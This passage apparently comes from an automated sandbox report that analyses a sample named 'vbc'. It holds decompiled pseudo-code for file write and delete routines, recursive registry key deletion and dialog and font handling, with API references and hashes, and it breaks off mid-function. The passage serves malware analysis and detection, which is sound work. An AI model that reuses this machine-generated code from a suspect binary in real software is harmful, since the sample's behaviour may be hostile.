							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
Opcode Fuzzy Hash: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98

Uniqueness

Uniqueness Score: -1.00%

Function 734F1979 Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E734F1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x734f506c = _a8;
				_t77 = 0;
				 *0x734f5070 = _a16;
				_v12 = 0;
				_v8 = E734F12E3();
				_t90 = E734F13B1(_t42);
				_t87 = _t85;
				_t81 = E734F12E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E734F12E3();
					_t77 = E734F13B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E734F1510(_t85, _t90, _t87,  &_v76);
								E734F1312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E734F3050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E734F3070(_t59, _t83, _t85);
						} else {
							_t48 = E734F30A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E734F2EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E734F2F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E734F2EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x734f1979
0x734f1983
0x734f198c
0x734f198f
0x734f1994
0x734f199d
0x734f19a6
0x734f19a8
0x734f19af
0x734f19b1
0x734f19b4
0x734f19bb
0x734f19c9
0x734f19d2
0x734f19d7
0x734f19da
0x734f19e0
0x734f19e0
0x734f19e3
0x734f19e6
0x734f19e9
0x734f1ab1
0x734f1ab1
0x734f1ab4
0x734f1b34
0x734f1b39
0x734f1b48
0x734f1b4b
0x734f1b53
0x734f1b53
0x734f1b53
0x734f1b55
0x734f1b55
0x734f1b56
0x734f1b56
0x734f1b58
0x734f1b5a
0x734f1b60
0x734f1b69
0x734f1b7a
0x734f1b85
0x734f1b85
0x734f1b4d
0x734f1b2f
0x734f1b2f
0x734f1b31
0x734f1b31
0x00000000
0x734f1b31
0x734f1b4f
0x734f1b51
0x00000000
0x00000000
0x00000000
0x734f1b51
0x734f1b3d
0x734f1b41
0x00000000
0x734f1b41
0x734f1ab6
0x734f1ab6
0x734f1ab7
0x734f1b26
0x734f1b28
0x00000000
0x00000000
0x734f1b2a
0x734f1b2d
0x00000000
0x00000000
0x00000000
0x734f1b2d
0x734f1ab9
0x734f1ab9
0x734f1aba
0x734f1af7
0x734f1afc
0x734f1b19
0x734f1b1c
0x00000000
0x00000000
0x734f1b1e
0x00000000
0x00000000
0x734f1b20
0x734f1b22
0x00000000
0x00000000
0x00000000
0x734f1b24
0x734f1afe
0x734f1b03
0x734f1b05
0x734f1b07
0x734f1b09
0x734f1b12
0x734f1b0b
0x734f1b0b
0x734f1b0b
0x00000000
0x734f1b09
0x734f1abc
0x734f1abc
0x734f1abf
0x734f1af0
0x734f1af2
0x00000000
0x734f1af2
0x734f1ac1
0x734f1ac1
0x734f1ac4
0x734f1ad7
0x734f1adc
0x734f1ae9
0x734f1aeb
0x00000000
0x734f1aeb
0x734f1ade
0x734f1ae0
0x00000000
0x00000000
0x734f1ae2
0x734f1ae5
0x00000000
0x00000000
0x00000000
0x734f1ae7
0x734f1ac7
0x734f1ac8
0x734f1ace
0x734f1ad0
0x734f1ad0
0x00000000
0x734f1ac8
0x734f19ef
0x734f1a68
0x734f1a6a
0x734f1a6d
0x734f1a8b
0x734f1a8e
0x734f1a94
0x734f1a99
0x734f1a6f
0x734f1a6f
0x734f1a73
0x734f1a77
0x734f1a79
0x734f1a79
0x734f1a9c
0x734f1aa0
0x00000000
0x734f1aa6
0x734f1aa6
0x734f1aa9
0x00000000
0x734f1aa9
0x734f1aa0
0x734f19f1
0x734f19f4
0x734f1a59
0x734f1a5b
0x734f1a5d
0x00000000
0x00000000
0x00000000
0x734f1a63
0x734f19f6
0x734f19f9
0x00000000
0x00000000
0x734f19fb
0x734f19fc
0x734f1a32
0x734f1a37
0x734f1a4f
0x734f1a51
0x00000000
0x734f1a51
0x734f1a39
0x734f1a3b
0x00000000
0x00000000
0x734f1a41
0x734f1a44
0x00000000
0x00000000
0x00000000
0x734f1a4a
0x734f19fe
0x734f1a01
0x734f1a28
0x00000000
0x734f1a03
0x734f1a03
0x734f1a04
0x734f1a18
0x734f1a1a
0x734f1a06
0x734f1a08
0x734f1a0e
0x734f1a10
0x734f1a10
0x734f1a08
0x00000000
0x734f1a04

APIs

GlobalFree.KERNEL32(?), ref: 734F19DA
GlobalFree.KERNEL32(?), ref: 734F1B7A
GlobalFree.KERNEL32(?), ref: 734F1B7F

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
Instruction ID: 60d2fd4845723886afd4f31c48d11e59c5924cc4ad5ba204a4508bec8e1fb10b
Opcode Fuzzy Hash: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
Instruction Fuzzy Hash: 7551C432D0011BEFDB0E9FA4848079E7BBAEB44314F1D415ED417B3398E671A946879D

Uniqueness

Uniqueness Score: -1.00%

Function 734F2480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E734F2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E734F135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E734F12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M734F25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E734F13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E734F13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x734f506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x734f506c, __eax,  *0x734f506c, 0, 0);
									goto L27;
								case 4:
									__eax = E734F12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E734F13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x734f506c =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
									 *__ebx =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
									asm("cdq");
									__eax = E734F1510(__edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18, __edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E734F12CC(0x734f5044);
					goto L10;
				}
			}

0x734f2494
0x734f2498
0x734f24a3
0x734f24a3
0x734f24aa
0x734f24af
0x00000000
0x00000000
0x734f24b3
0x734f24b6
0x00000000
0x00000000
0x734f24bb
0x734f24c6
0x734f24d6
0x00000000
0x734f24cd
0x734f24cf
0x734f24e5
0x00000000
0x734f24e5
0x734f24bd
0x734f24bd
0x734f24e6
0x734f24e6
0x734f24e8
0x734f24ec
0x734f24ec
0x734f24ef
0x734f24ef
0x734f24f7
0x734f24ff
0x734f2502
0x734f25c1
0x734f25c2
0x734f25cd
0x734f25f7
0x734f25f7
0x734f25dd
0x734f25e9
0x734f25df
0x734f25df
0x734f25df
0x00000000
0x734f2508
0x734f2508
0x00000000
0x734f250f
0x00000000
0x00000000
0x734f2517
0x00000000
0x00000000
0x734f2525
0x734f2527
0x00000000
0x00000000
0x734f2548
0x734f254e
0x734f2551
0x734f2553
0x734f2563
0x00000000
0x00000000
0x734f2530
0x734f2535
0x734f2538
0x734f2539
0x00000000
0x00000000
0x734f256f
0x734f2575
0x734f2576
0x734f2579
0x734f257a
0x734f257c
0x00000000
0x00000000
0x734f2588
0x734f258b
0x734f2597
0x734f2599
0x00000000
0x00000000
0x734f25a5
0x734f25b1
0x734f25b4
0x734f25b6
0x734f25b9
0x00000000
0x00000000
0x734f2508
0x734f2502
0x734f24db
0x734f24e0
0x00000000
0x734f24e0

APIs

GlobalFree.KERNEL32(00000000), ref: 734F25C2

Part of subcall function 734F12CC: lstrcpynW.KERNEL32(00000000,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12DC

GlobalAlloc.KERNEL32(00000040), ref: 734F2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 734F2563

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
Instruction ID: b86d4a62d0bede8048e85a752c99c46de153c9a5163161af9ff9b64bfe6262a6
Opcode Fuzzy Hash: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
Instruction Fuzzy Hash: E641BEB900870BEFE75CEF25D840B2677F8FB44310F1C891DE45A96681EB70A545CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068E7(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402F74

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
